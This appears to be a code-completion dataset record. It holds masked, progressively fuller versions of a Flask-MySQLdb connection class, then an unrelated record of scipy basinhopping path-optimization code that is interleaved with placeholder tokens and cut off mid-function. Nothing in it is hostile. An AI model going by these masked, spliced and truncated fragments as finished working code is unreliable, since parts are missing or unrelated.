"step-2": "<mask token>\n\n\nclass MySQL(object):\n\n def __init__(self, app=None):\n self.app = app\n if app is not None:\n self.init_app(app)\n\n def init_app(self, app):\n \"\"\"Initialize the `app` for use with this\n :class:`~flask_mysqldb.MySQL` class.\n This is called automatically if `app` is passed to\n :meth:`~MySQL.__init__`.\n\n :param flask.Flask app: the application to configure for use with\n this :class:`~flask_mysqldb.MySQL` class.\n \"\"\"\n app.config.setdefault('MYSQL_HOST', 'localhost')\n app.config.setdefault('MYSQL_USER', None)\n app.config.setdefault('MYSQL_PASSWORD', None)\n app.config.setdefault('MYSQL_DB', None)\n app.config.setdefault('MYSQL_PORT', 3306)\n app.config.setdefault('MYSQL_UNIX_SOCKET', None)\n app.config.setdefault('MYSQL_CONNECT_TIMEOUT', 10)\n app.config.setdefault('MYSQL_READ_DEFAULT_FILE', None)\n app.config.setdefault('MYSQL_USE_UNICODE', True)\n app.config.setdefault('MYSQL_CHARSET', 'utf8')\n app.config.setdefault('MYSQL_SQL_MODE', None)\n app.config.setdefault('MYSQL_CURSORCLASS', None)\n if hasattr(app, 'teardown_appcontext'):\n app.teardown_appcontext(self.teardown)\n\n @property\n def connect(self):\n kwargs = {}\n if current_app.config['MYSQL_HOST']:\n kwargs['host'] = current_app.config['MYSQL_HOST']\n if current_app.config['MYSQL_USER']:\n kwargs['user'] = current_app.config['MYSQL_USER']\n if current_app.config['MYSQL_PASSWORD']:\n kwargs['passwd'] = current_app.config['MYSQL_PASSWORD']\n if current_app.config['MYSQL_DB']:\n kwargs['db'] = current_app.config['MYSQL_DB']\n if current_app.config['MYSQL_PORT']:\n kwargs['port'] = current_app.config['MYSQL_PORT']\n if current_app.config['MYSQL_UNIX_SOCKET']:\n kwargs['unix_socket'] = current_app.config['MYSQL_UNIX_SOCKET']\n if current_app.config['MYSQL_CONNECT_TIMEOUT']:\n kwargs['connect_timeout'] = current_app.config[\n 'MYSQL_CONNECT_TIMEOUT']\n if current_app.config['MYSQL_READ_DEFAULT_FILE']:\n kwargs['read_default_file'] = current_app.config[\n 
'MYSQL_READ_DEFAULT_FILE']\n if current_app.config['MYSQL_USE_UNICODE']:\n kwargs['use_unicode'] = current_app.config['MYSQL_USE_UNICODE']\n if current_app.config['MYSQL_CHARSET']:\n kwargs['charset'] = current_app.config['MYSQL_CHARSET']\n if current_app.config['MYSQL_SQL_MODE']:\n kwargs['sql_mode'] = current_app.config['MYSQL_SQL_MODE']\n if current_app.config['MYSQL_CURSORCLASS']:\n kwargs['cursorclass'] = getattr(MySQLdb.cursors, current_app.\n config['MYSQL_CURSORCLASS'])\n return MySQLdb.connect(**kwargs)\n <mask token>\n\n def teardown(self, exception):\n ctx = _app_ctx_stack.top\n if hasattr(ctx, 'mysql_db'):\n ctx.mysql_db.close()\n",
"step-3": "<mask token>\n\n\nclass MySQL(object):\n\n def __init__(self, app=None):\n self.app = app\n if app is not None:\n self.init_app(app)\n\n def init_app(self, app):\n \"\"\"Initialize the `app` for use with this\n :class:`~flask_mysqldb.MySQL` class.\n This is called automatically if `app` is passed to\n :meth:`~MySQL.__init__`.\n\n :param flask.Flask app: the application to configure for use with\n this :class:`~flask_mysqldb.MySQL` class.\n \"\"\"\n app.config.setdefault('MYSQL_HOST', 'localhost')\n app.config.setdefault('MYSQL_USER', None)\n app.config.setdefault('MYSQL_PASSWORD', None)\n app.config.setdefault('MYSQL_DB', None)\n app.config.setdefault('MYSQL_PORT', 3306)\n app.config.setdefault('MYSQL_UNIX_SOCKET', None)\n app.config.setdefault('MYSQL_CONNECT_TIMEOUT', 10)\n app.config.setdefault('MYSQL_READ_DEFAULT_FILE', None)\n app.config.setdefault('MYSQL_USE_UNICODE', True)\n app.config.setdefault('MYSQL_CHARSET', 'utf8')\n app.config.setdefault('MYSQL_SQL_MODE', None)\n app.config.setdefault('MYSQL_CURSORCLASS', None)\n if hasattr(app, 'teardown_appcontext'):\n app.teardown_appcontext(self.teardown)\n\n @property\n def connect(self):\n kwargs = {}\n if current_app.config['MYSQL_HOST']:\n kwargs['host'] = current_app.config['MYSQL_HOST']\n if current_app.config['MYSQL_USER']:\n kwargs['user'] = current_app.config['MYSQL_USER']\n if current_app.config['MYSQL_PASSWORD']:\n kwargs['passwd'] = current_app.config['MYSQL_PASSWORD']\n if current_app.config['MYSQL_DB']:\n kwargs['db'] = current_app.config['MYSQL_DB']\n if current_app.config['MYSQL_PORT']:\n kwargs['port'] = current_app.config['MYSQL_PORT']\n if current_app.config['MYSQL_UNIX_SOCKET']:\n kwargs['unix_socket'] = current_app.config['MYSQL_UNIX_SOCKET']\n if current_app.config['MYSQL_CONNECT_TIMEOUT']:\n kwargs['connect_timeout'] = current_app.config[\n 'MYSQL_CONNECT_TIMEOUT']\n if current_app.config['MYSQL_READ_DEFAULT_FILE']:\n kwargs['read_default_file'] = current_app.config[\n 
'MYSQL_READ_DEFAULT_FILE']\n if current_app.config['MYSQL_USE_UNICODE']:\n kwargs['use_unicode'] = current_app.config['MYSQL_USE_UNICODE']\n if current_app.config['MYSQL_CHARSET']:\n kwargs['charset'] = current_app.config['MYSQL_CHARSET']\n if current_app.config['MYSQL_SQL_MODE']:\n kwargs['sql_mode'] = current_app.config['MYSQL_SQL_MODE']\n if current_app.config['MYSQL_CURSORCLASS']:\n kwargs['cursorclass'] = getattr(MySQLdb.cursors, current_app.\n config['MYSQL_CURSORCLASS'])\n return MySQLdb.connect(**kwargs)\n\n @property\n def connection(self):\n \"\"\"Attempts to connect to the MySQL server.\n\n :return: Bound MySQL connection object if successful or ``None`` if\n unsuccessful.\n \"\"\"\n ctx = _app_ctx_stack.top\n if ctx is not None:\n if not hasattr(ctx, 'mysql_db'):\n ctx.mysql_db = self.connect\n return ctx.mysql_db\n\n def teardown(self, exception):\n ctx = _app_ctx_stack.top\n if hasattr(ctx, 'mysql_db'):\n ctx.mysql_db.close()\n",
"step-4": "import MySQLdb\nimport MySQLdb.cursors\nfrom flask import _app_ctx_stack, current_app\n\n\nclass MySQL(object):\n\n def __init__(self, app=None):\n self.app = app\n if app is not None:\n self.init_app(app)\n\n def init_app(self, app):\n \"\"\"Initialize the `app` for use with this\n :class:`~flask_mysqldb.MySQL` class.\n This is called automatically if `app` is passed to\n :meth:`~MySQL.__init__`.\n\n :param flask.Flask app: the application to configure for use with\n this :class:`~flask_mysqldb.MySQL` class.\n \"\"\"\n app.config.setdefault('MYSQL_HOST', 'localhost')\n app.config.setdefault('MYSQL_USER', None)\n app.config.setdefault('MYSQL_PASSWORD', None)\n app.config.setdefault('MYSQL_DB', None)\n app.config.setdefault('MYSQL_PORT', 3306)\n app.config.setdefault('MYSQL_UNIX_SOCKET', None)\n app.config.setdefault('MYSQL_CONNECT_TIMEOUT', 10)\n app.config.setdefault('MYSQL_READ_DEFAULT_FILE', None)\n app.config.setdefault('MYSQL_USE_UNICODE', True)\n app.config.setdefault('MYSQL_CHARSET', 'utf8')\n app.config.setdefault('MYSQL_SQL_MODE', None)\n app.config.setdefault('MYSQL_CURSORCLASS', None)\n if hasattr(app, 'teardown_appcontext'):\n app.teardown_appcontext(self.teardown)\n\n @property\n def connect(self):\n kwargs = {}\n if current_app.config['MYSQL_HOST']:\n kwargs['host'] = current_app.config['MYSQL_HOST']\n if current_app.config['MYSQL_USER']:\n kwargs['user'] = current_app.config['MYSQL_USER']\n if current_app.config['MYSQL_PASSWORD']:\n kwargs['passwd'] = current_app.config['MYSQL_PASSWORD']\n if current_app.config['MYSQL_DB']:\n kwargs['db'] = current_app.config['MYSQL_DB']\n if current_app.config['MYSQL_PORT']:\n kwargs['port'] = current_app.config['MYSQL_PORT']\n if current_app.config['MYSQL_UNIX_SOCKET']:\n kwargs['unix_socket'] = current_app.config['MYSQL_UNIX_SOCKET']\n if current_app.config['MYSQL_CONNECT_TIMEOUT']:\n kwargs['connect_timeout'] = current_app.config[\n 'MYSQL_CONNECT_TIMEOUT']\n if 
current_app.config['MYSQL_READ_DEFAULT_FILE']:\n kwargs['read_default_file'] = current_app.config[\n 'MYSQL_READ_DEFAULT_FILE']\n if current_app.config['MYSQL_USE_UNICODE']:\n kwargs['use_unicode'] = current_app.config['MYSQL_USE_UNICODE']\n if current_app.config['MYSQL_CHARSET']:\n kwargs['charset'] = current_app.config['MYSQL_CHARSET']\n if current_app.config['MYSQL_SQL_MODE']:\n kwargs['sql_mode'] = current_app.config['MYSQL_SQL_MODE']\n if current_app.config['MYSQL_CURSORCLASS']:\n kwargs['cursorclass'] = getattr(MySQLdb.cursors, current_app.\n config['MYSQL_CURSORCLASS'])\n return MySQLdb.connect(**kwargs)\n\n @property\n def connection(self):\n \"\"\"Attempts to connect to the MySQL server.\n\n :return: Bound MySQL connection object if successful or ``None`` if\n unsuccessful.\n \"\"\"\n ctx = _app_ctx_stack.top\n if ctx is not None:\n if not hasattr(ctx, 'mysql_db'):\n ctx.mysql_db = self.connect\n return ctx.mysql_db\n\n def teardown(self, exception):\n ctx = _app_ctx_stack.top\n if hasattr(ctx, 'mysql_db'):\n ctx.mysql_db.close()\n",
"step-5": "import MySQLdb\nimport MySQLdb.cursors\nfrom flask import _app_ctx_stack, current_app\n\n\nclass MySQL(object):\n\n def __init__(self, app=None):\n self.app = app\n if app is not None:\n self.init_app(app)\n\n def init_app(self, app):\n \"\"\"Initialize the `app` for use with this\n :class:`~flask_mysqldb.MySQL` class.\n This is called automatically if `app` is passed to\n :meth:`~MySQL.__init__`.\n\n :param flask.Flask app: the application to configure for use with\n this :class:`~flask_mysqldb.MySQL` class.\n \"\"\"\n\n app.config.setdefault('MYSQL_HOST', 'localhost')\n app.config.setdefault('MYSQL_USER', None)\n app.config.setdefault('MYSQL_PASSWORD', None)\n app.config.setdefault('MYSQL_DB', None)\n app.config.setdefault('MYSQL_PORT', 3306)\n app.config.setdefault('MYSQL_UNIX_SOCKET', None)\n app.config.setdefault('MYSQL_CONNECT_TIMEOUT', 10)\n app.config.setdefault('MYSQL_READ_DEFAULT_FILE', None)\n app.config.setdefault('MYSQL_USE_UNICODE', True)\n app.config.setdefault('MYSQL_CHARSET', 'utf8')\n app.config.setdefault('MYSQL_SQL_MODE', None)\n app.config.setdefault('MYSQL_CURSORCLASS', None)\n\n if hasattr(app, 'teardown_appcontext'):\n app.teardown_appcontext(self.teardown)\n\n @property\n def connect(self):\n kwargs = {}\n\n if current_app.config['MYSQL_HOST']:\n kwargs['host'] = current_app.config['MYSQL_HOST']\n\n if current_app.config['MYSQL_USER']:\n kwargs['user'] = current_app.config['MYSQL_USER']\n\n if current_app.config['MYSQL_PASSWORD']:\n kwargs['passwd'] = current_app.config['MYSQL_PASSWORD']\n\n if current_app.config['MYSQL_DB']:\n kwargs['db'] = current_app.config['MYSQL_DB']\n\n if current_app.config['MYSQL_PORT']:\n kwargs['port'] = current_app.config['MYSQL_PORT']\n\n if current_app.config['MYSQL_UNIX_SOCKET']:\n kwargs['unix_socket'] = current_app.config['MYSQL_UNIX_SOCKET']\n\n if current_app.config['MYSQL_CONNECT_TIMEOUT']:\n kwargs['connect_timeout'] = \\\n current_app.config['MYSQL_CONNECT_TIMEOUT']\n\n if 
current_app.config['MYSQL_READ_DEFAULT_FILE']:\n kwargs['read_default_file'] = \\\n current_app.config['MYSQL_READ_DEFAULT_FILE']\n\n if current_app.config['MYSQL_USE_UNICODE']:\n kwargs['use_unicode'] = current_app.config['MYSQL_USE_UNICODE']\n\n if current_app.config['MYSQL_CHARSET']:\n kwargs['charset'] = current_app.config['MYSQL_CHARSET']\n\n if current_app.config['MYSQL_SQL_MODE']:\n kwargs['sql_mode'] = current_app.config['MYSQL_SQL_MODE']\n\n if current_app.config['MYSQL_CURSORCLASS']:\n kwargs['cursorclass'] = getattr(MySQLdb.cursors, current_app.config['MYSQL_CURSORCLASS'])\n\n return MySQLdb.connect(**kwargs)\n\n @property\n def connection(self):\n \"\"\"Attempts to connect to the MySQL server.\n\n :return: Bound MySQL connection object if successful or ``None`` if\n unsuccessful.\n \"\"\"\n\n ctx = _app_ctx_stack.top\n if ctx is not None:\n if not hasattr(ctx, 'mysql_db'):\n ctx.mysql_db = self.connect\n return ctx.mysql_db\n\n def teardown(self, exception):\n ctx = _app_ctx_stack.top\n if hasattr(ctx, 'mysql_db'):\n ctx.mysql_db.close()\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
class Bounds(object):
    """Feasibility test for scipy.optimize.basinhopping's ``accept_test``.

    A vector ``x`` of transition times is feasible when every component
    lies in ``[xmin, xmax]``, consecutive times are separated by at least
    the corresponding transition cost, and ``x[0] <= costs[0]``.
    """

    def __init__(self, xmin, xmax, costs):
        # xmin/xmax are scalar box bounds applied component-wise;
        # costs[i] is the minimum spacing required before time i.
        self.xmax = xmax
        self.xmin = xmin
        self.costs = costs

    def is_valid(self, x):
        """Return True when ``x`` satisfies the box and ordering constraints."""
        below_max = bool(np.all(x <= self.xmax))
        above_min = bool(np.all(x >= self.xmin))
        in_order = [(x[i] + c <= x[i + 1]) for i, c in enumerate(self.costs
            [1:])]
        in_order.append(x[0] <= self.costs[0])
        return below_max and above_min and all(in_order)

    def __call__(self, **kwargs):
        # basinhopping's accept_test protocol supplies the candidate as x_new.
        x = kwargs['x_new']
        return self.is_valid(x)

    def SLSQP_constraints(self):
        """Return inequality constraints for SLSQP,
        in particular, assert that 0 >= x_i - x_i-1 forall i.

        Bug fix: the original lambdas closed over the loop variables ``i``
        and ``c`` late, so every constraint saw the final loop values (and
        the trailing ``lambda x: -x[i]`` referenced a leaked loop variable,
        a NameError on Python 3).  Loop variables are now bound eagerly via
        default arguments, and the trailing lambda is replaced by one
        upper-bound constraint per component.
        """
        funs = [(lambda x, i=i, c=c: x[i + 1] - x[i] + c)
                for i, c in enumerate(self.costs[1:])]
        funs.append(lambda x: x[0] + self.costs[0])
        n = len(self.costs)
        # Per-component lower bounds (x_i >= 0, matching the original) and
        # upper bounds (x_i <= xmax); presumably xmin is 0 here -- TODO
        # confirm against callers, which construct Bounds(0.0, ...).
        funs += [(lambda x, i=i: x[i]) for i in range(n)]
        funs += [(lambda x, i=i: self.xmax - x[i]) for i in range(n)]
        # Matrix form b - A.x >= 0 for SLSQP: -I rows encode lower bounds,
        # I rows encode upper bounds, and the rolled [1, -1] rows encode
        # the consecutive-time spacing constraints.
        neg = np.identity(n) * -1
        rhs1 = np.ones(n) * self.xmin
        rhs1[0] += self.costs[0]
        tmax = np.identity(n)
        rhs2 = np.ones(n) * self.xmax
        A = np.vstack((neg, tmax))
        b = np.hstack((rhs1, rhs2))
        if n >= 2:
            root = [1, -1] + [0] * (n - 2)
            z = np.vstack([np.roll(root, i) for i in range(n - 1)])
            rhs3 = np.array(self.costs[1:])
            A = np.vstack((A, z))
            b = np.hstack((b, rhs3))
        return {'slsqp': {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)
            }, 'cobyla': [{'type': 'ineq', 'fun': f} for f in funs]}

    def SLSQP_bounds(self):
        """Return the box bounds as a per-component sequence of pairs."""
        return [(self.xmin, self.xmax) for _ in range(len(self.costs))]
class Stepper(object):
    """Custom basinhopping ``take_step`` that only proposes feasible moves.

    Each call draws a uniform random displacement whose radius shrinks
    geometrically (factor ``deflate``) on every attempt; the first
    candidate accepted by ``bounds`` is taken.  If no attempt succeeds
    within ``max_iter`` tries the point is returned unchanged.
    """

    def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):
        self.bounds = bounds
        self.stepsize = stepsize
        self.max_iter = max_iter
        self.deflate = deflate

    def __call__(self, x):
        # Fix: dropped the unused ``y = None`` local; range for Py3 compat.
        for attempt in range(self.max_iter):
            radius = self.stepsize * self.deflate ** (attempt + 1)
            u = np.random.uniform(-radius, radius, x.shape)
            if self.bounds.is_valid(x + u):
                x += u  # NOTE: mutates the caller's array in place.
                return x
        return x
<|reserved_special_token_0|>
def best_path(paths, Behaviour_Table, BTG, F, dt=1.0, maxiter=20, Acc0=None,
    method='SLSQP'):
    """
    Perform the mixed ILP optimization (without queues, or memory), that yields
    the optimal behaviour transition through the BTG.
    :paths -> iterable of path-iterables, path-domain for optimization
              Each path-iterable contains only behaviour_id.
    :Behaviour_Table -> Dict of the form {behaviour_id: <behaviour_vec>}
                        Must contain all behaviours in btg
    :btg -> Behaviour Transition Graph, nodes are behaviour_ids,
            dictionary of the form {(v_1, v_2): tau_1,2}
    :F -> Prediction matrix, of shape (|b_vec|, n),
          where n is int(T_max/dt)
    :dt -> Prediction time-resolution
    :Acc0 -> Initial queue Accumulator (queue length) value, defaults 0.

    Returns the (path, scipy OptimizeResult) pair whose optimized objective
    value is lowest over all candidate paths.
    """
    # Default to empty queues (one accumulator per behaviour row of F).
    Acc0 = np.zeros(F.shape[0]) if Acc0 is None else Acc0
    Solutions = []
    # Latest admissible transition time covered by the prediction horizon.
    t_max = int((F.shape[-1] - 1) * dt)
    # Basinhopping "temperature": average predicted mass per path step,
    # so hop acceptance is scaled to the typical objective magnitude.
    initial_T = F.sum() / len(paths[0])
    for path in paths:
        # Build the objective, a feasible start, the bounds object and the
        # feasibility-aware step proposal for this candidate path.
        L, x0, bounds, step_taker = opt_params(path, Behaviour_Table, BTG,
            t_max, F, dt=dt, Acc0=Acc0)
        minimizer_kwargs = {'method': method, 'bounds': bounds.SLSQP_bounds
            (), 'constraints': bounds.SLSQP_constraints()[method.lower()]}
        result = basinhopping(L, x0.copy(), accept_test=bounds, take_step=
            step_taker, stepsize=10 * dt, niter=maxiter, T=initial_T,
            interval=20, minimizer_kwargs=minimizer_kwargs)
        Solutions.append(result)
    # Keep the candidate path with the smallest optimized objective (.fun).
    i, BestPath = min(((i, s) for i, s in enumerate(Solutions)), key=lambda
        x: x[1].fun)
    return paths[i], BestPath
def opt_params(path, BTable, BTG, t_max, F, dt, Acc0, q_acc_model=qsim.
    integrator, q_acc_model_args=[], q_model_kwargs={}, q_relief_model=qsim
    .linear_relief, deadtime_penalty=4):
    """Generates the components necessary to completely specify
    best-path optimization routine. (With a queue model)

    Returns:
    :cost -> objective function L(x) evaluated on the queue simulation
    :x0 -> an initial realizeable solution
    :bounds -> a Bounds() object, that defines surrounding hyper-volume for x
    :step_taker -> a Stepper() proposing feasible basinhopping moves

    NOTE(review): q_acc_model, q_acc_model_args, q_model_kwargs and
    q_relief_model are accepted for interface compatibility but unused in
    this body -- presumably consumed by an earlier revision; confirm
    before removing.
    """
    # Bug fix: np.vstack requires a sequence of arrays; passing a bare
    # generator is deprecated (and a hard error on modern NumPy), so the
    # per-behaviour vectors are materialized in a list first.
    B = np.vstack([BTable[bid] for bid in path])
    taus = transition_costs(path, BTG)
    x0 = initial_soln(path, t_max)
    bounds = Bounds(0.0, (F.shape[-1] - 1) * dt, taus)

    def cost(x, p=deadtime_penalty):
        """Simulate the queue effects, and then evaluate the objective
        function on the simulation result."""
        # Average arrival rate per behaviour over the prediction horizon.
        k = F.shape[1] if F.shape[1] > 0 else 1
        avg_rates = F.sum(1) / k
        Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=
            BTable, Acc0=Acc0, relief_mode_kwargs={'rate': 0.5})
        cum_Z = np.cumsum(Z, axis=1)
        # Count of time-slots with any service activity, per behaviour.
        Deadtimes = np.where(Z == 0, 0, 1).sum(1)
        # Negative reward plus deadtime and residual-queue penalties
        # (minimized by basinhopping).
        return -obj(x, B, cum_Z, taus, dt=dt) + 0.25 * avg_rates.dot(
            Deadtimes) ** 2 - avg_rates.sum() * Acc.sum()

    step_taker = Stepper(bounds, 10, 20)
    return cost, x0, bounds, step_taker
<|reserved_special_token_0|>
def parse_behaviours(behaviours, dtype=np.float32):
    """[(bid, [bvec])] -> {bid: <bvec>}

    Each behaviour matrix is collapsed to a vector by summing over axis 1.
    """
    table = {}
    for bid, bvec in behaviours:
        table[bid] = np.array(bvec).sum(1)
    return table
def parse_prediction(F):
    """[[float]] -> np.array(...) of same shape"""
    prediction = np.array(F)
    return prediction
<|reserved_special_token_0|>
def range_sum(cum_F, a, b, penalty=-1000):
    """Sum of F over (a, b] via the cumulative matrix ``cum_F``.

    Penalty brutally dominates any out-of-index operation: if either
    endpoint is outside the horizon, a penalty vector is returned instead.
    """
    last = cum_F.shape[-1] - 1
    in_range = (0 <= a <= last) and (0 <= b <= last)
    if in_range:
        return cum_F[..., b] - cum_F[..., a]
    return np.ones(cum_F.shape[0]) * penalty
<|reserved_special_token_0|>
def barrier(times, path, BTG):
    """Handles Linear/causality Constraints with respect to transitions.

    Returns 0.0 when every transition in ``path`` waits at least its edge
    cost tau, otherwise the (negative) sum of all constraint violations.
    """
    # Prepend the implicit start time 0 for the first transition.
    t = [0] + list(times)
    S = 0.0
    for i in range(len(path) - 1):  # range: Py2's xrange is gone in Py3
        edge = path[i], path[i + 1]
        tau = BTG[edge]
        # Accumulate only the shortfall when the dwell time is below tau.
        S += min(0, t[i + 1] - t[i] - tau)
    return S
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Bounds(object):
    """Feasibility test for scipy.optimize.basinhopping's ``accept_test``.

    A vector ``x`` of transition times is feasible when every component
    lies in ``[xmin, xmax]``, consecutive times are separated by at least
    the corresponding transition cost, and ``x[0] <= costs[0]``.
    """

    def __init__(self, xmin, xmax, costs):
        # xmin/xmax are scalar box bounds applied component-wise;
        # costs[i] is the minimum spacing required before time i.
        self.xmax = xmax
        self.xmin = xmin
        self.costs = costs

    def is_valid(self, x):
        """Return True when ``x`` satisfies the box and ordering constraints."""
        below_max = bool(np.all(x <= self.xmax))
        above_min = bool(np.all(x >= self.xmin))
        in_order = [(x[i] + c <= x[i + 1]) for i, c in enumerate(self.costs
            [1:])]
        in_order.append(x[0] <= self.costs[0])
        return below_max and above_min and all(in_order)

    def __call__(self, **kwargs):
        # basinhopping's accept_test protocol supplies the candidate as x_new.
        x = kwargs['x_new']
        return self.is_valid(x)

    def SLSQP_constraints(self):
        """Return inequality constraints for SLSQP,
        in particular, assert that 0 >= x_i - x_i-1 forall i.

        Bug fix: the original lambdas closed over the loop variables ``i``
        and ``c`` late, so every constraint saw the final loop values (and
        the trailing ``lambda x: -x[i]`` referenced a leaked loop variable,
        a NameError on Python 3).  Loop variables are now bound eagerly via
        default arguments, and the trailing lambda is replaced by one
        upper-bound constraint per component.
        """
        funs = [(lambda x, i=i, c=c: x[i + 1] - x[i] + c)
                for i, c in enumerate(self.costs[1:])]
        funs.append(lambda x: x[0] + self.costs[0])
        n = len(self.costs)
        # Per-component lower bounds (x_i >= 0, matching the original) and
        # upper bounds (x_i <= xmax); presumably xmin is 0 here -- TODO
        # confirm against callers, which construct Bounds(0.0, ...).
        funs += [(lambda x, i=i: x[i]) for i in range(n)]
        funs += [(lambda x, i=i: self.xmax - x[i]) for i in range(n)]
        # Matrix form b - A.x >= 0 for SLSQP: -I rows encode lower bounds,
        # I rows encode upper bounds, and the rolled [1, -1] rows encode
        # the consecutive-time spacing constraints.
        neg = np.identity(n) * -1
        rhs1 = np.ones(n) * self.xmin
        rhs1[0] += self.costs[0]
        tmax = np.identity(n)
        rhs2 = np.ones(n) * self.xmax
        A = np.vstack((neg, tmax))
        b = np.hstack((rhs1, rhs2))
        if n >= 2:
            root = [1, -1] + [0] * (n - 2)
            z = np.vstack([np.roll(root, i) for i in range(n - 1)])
            rhs3 = np.array(self.costs[1:])
            A = np.vstack((A, z))
            b = np.hstack((b, rhs3))
        return {'slsqp': {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)
            }, 'cobyla': [{'type': 'ineq', 'fun': f} for f in funs]}

    def SLSQP_bounds(self):
        """Return the box bounds as a per-component sequence of pairs."""
        return [(self.xmin, self.xmax) for _ in range(len(self.costs))]
class Stepper(object):
    """Custom basinhopping ``take_step`` that only proposes feasible moves.

    Each call draws a uniform random displacement whose radius shrinks
    geometrically (factor ``deflate``) on every attempt; the first
    candidate accepted by ``bounds`` is taken.  If no attempt succeeds
    within ``max_iter`` tries the point is returned unchanged.
    """

    def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):
        self.bounds = bounds
        self.stepsize = stepsize
        self.max_iter = max_iter
        self.deflate = deflate

    def __call__(self, x):
        # Fix: dropped the unused ``y = None`` local; range for Py3 compat.
        for attempt in range(self.max_iter):
            radius = self.stepsize * self.deflate ** (attempt + 1)
            u = np.random.uniform(-radius, radius, x.shape)
            if self.bounds.is_valid(x + u):
                x += u  # NOTE: mutates the caller's array in place.
                return x
        return x
def optimize_path(paths, behaviours, btg, start, prediction, dt, maxiter):
    """Erlang Entry Point to Optimization Module.

    Parses the wire-format arguments, runs best_path, and returns the
    winning path plus its transition times offset by ``start``.
    """
    table = parse_behaviours(behaviours)
    graph = parse_edgelist(btg)
    forecast = parse_prediction(prediction)
    winner, solution = best_path(paths, table, graph, forecast, dt=dt,
        maxiter=10)
    return list(winner), map(lambda t: int(t) + start, solution.x)
def best_path(paths, Behaviour_Table, BTG, F, dt=1.0, maxiter=20, Acc0=None,
    method='SLSQP'):
    """
    Perform the mixed ILP optimization (without queues, or memory), that yields
    the optimal behaviour transition through the BTG.
    :paths -> iterable of path-iterables, path-domain for optimization
              Each path-iterable contains only behaviour_id.
    :Behaviour_Table -> Dict of the form {behaviour_id: <behaviour_vec>}
                        Must contain all behaviours in btg
    :btg -> Behaviour Transition Graph, nodes are behaviour_ids,
            dictionary of the form {(v_1, v_2): tau_1,2}
    :F -> Prediction matrix, of shape (|b_vec|, n),
          where n is int(T_max/dt)
    :dt -> Prediction time-resolution
    :Acc0 -> Initial queue Accumulator (queue length) value, defaults 0.

    Returns the (path, scipy OptimizeResult) pair whose optimized objective
    value is lowest over all candidate paths.
    """
    # Default to empty queues (one accumulator per behaviour row of F).
    Acc0 = np.zeros(F.shape[0]) if Acc0 is None else Acc0
    Solutions = []
    # Latest admissible transition time covered by the prediction horizon.
    t_max = int((F.shape[-1] - 1) * dt)
    # Basinhopping "temperature": average predicted mass per path step,
    # so hop acceptance is scaled to the typical objective magnitude.
    initial_T = F.sum() / len(paths[0])
    for path in paths:
        # Build the objective, a feasible start, the bounds object and the
        # feasibility-aware step proposal for this candidate path.
        L, x0, bounds, step_taker = opt_params(path, Behaviour_Table, BTG,
            t_max, F, dt=dt, Acc0=Acc0)
        minimizer_kwargs = {'method': method, 'bounds': bounds.SLSQP_bounds
            (), 'constraints': bounds.SLSQP_constraints()[method.lower()]}
        result = basinhopping(L, x0.copy(), accept_test=bounds, take_step=
            step_taker, stepsize=10 * dt, niter=maxiter, T=initial_T,
            interval=20, minimizer_kwargs=minimizer_kwargs)
        Solutions.append(result)
    # Keep the candidate path with the smallest optimized objective (.fun).
    i, BestPath = min(((i, s) for i, s in enumerate(Solutions)), key=lambda
        x: x[1].fun)
    return paths[i], BestPath
def opt_params(path, BTable, BTG, t_max, F, dt, Acc0, q_acc_model=qsim.
    integrator, q_acc_model_args=[], q_model_kwargs={}, q_relief_model=qsim
    .linear_relief, deadtime_penalty=4):
    """Generates the components necessary to completely specify
    best-path optimization routine. (With a queue model)

    Returns:
    :cost -> objective function L(x) evaluated on the queue simulation
    :x0 -> an initial realizeable solution
    :bounds -> a Bounds() object, that defines surrounding hyper-volume for x
    :step_taker -> a Stepper() proposing feasible basinhopping moves

    NOTE(review): q_acc_model, q_acc_model_args, q_model_kwargs and
    q_relief_model are accepted for interface compatibility but unused in
    this body -- presumably consumed by an earlier revision; confirm
    before removing.
    """
    # Bug fix: np.vstack requires a sequence of arrays; passing a bare
    # generator is deprecated (and a hard error on modern NumPy), so the
    # per-behaviour vectors are materialized in a list first.
    B = np.vstack([BTable[bid] for bid in path])
    taus = transition_costs(path, BTG)
    x0 = initial_soln(path, t_max)
    bounds = Bounds(0.0, (F.shape[-1] - 1) * dt, taus)

    def cost(x, p=deadtime_penalty):
        """Simulate the queue effects, and then evaluate the objective
        function on the simulation result."""
        # Average arrival rate per behaviour over the prediction horizon.
        k = F.shape[1] if F.shape[1] > 0 else 1
        avg_rates = F.sum(1) / k
        Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=
            BTable, Acc0=Acc0, relief_mode_kwargs={'rate': 0.5})
        cum_Z = np.cumsum(Z, axis=1)
        # Count of time-slots with any service activity, per behaviour.
        Deadtimes = np.where(Z == 0, 0, 1).sum(1)
        # Negative reward plus deadtime and residual-queue penalties
        # (minimized by basinhopping).
        return -obj(x, B, cum_Z, taus, dt=dt) + 0.25 * avg_rates.dot(
            Deadtimes) ** 2 - avg_rates.sum() * Acc.sum()

    step_taker = Stepper(bounds, 10, 20)
    return cost, x0, bounds, step_taker
<|reserved_special_token_0|>
def parse_behaviours(behaviours, dtype=np.float32):
    """[(bid, [bvec])] -> {bid: <bvec>}

    Each behaviour matrix is collapsed to a vector by summing over axis 1.
    """
    table = {}
    for bid, bvec in behaviours:
        table[bid] = np.array(bvec).sum(1)
    return table
def parse_prediction(F):
    """[[float]] -> np.array(...) of same shape"""
    prediction = np.array(F)
    return prediction
<|reserved_special_token_0|>
def range_sum(cum_F, a, b, penalty=-1000):
    """Sum of F over (a, b] via the cumulative matrix ``cum_F``.

    Penalty brutally dominates any out-of-index operation: if either
    endpoint is outside the horizon, a penalty vector is returned instead.
    """
    last = cum_F.shape[-1] - 1
    in_range = (0 <= a <= last) and (0 <= b <= last)
    if in_range:
        return cum_F[..., b] - cum_F[..., a]
    return np.ones(cum_F.shape[0]) * penalty
<|reserved_special_token_0|>
def barrier(times, path, BTG):
    """Handles Linear/causality Constraints with respect to transitions.

    Returns 0.0 when every transition in ``path`` waits at least its edge
    cost tau, otherwise the (negative) sum of all constraint violations.
    """
    # Prepend the implicit start time 0 for the first transition.
    t = [0] + list(times)
    S = 0.0
    for i in range(len(path) - 1):  # range: Py2's xrange is gone in Py3
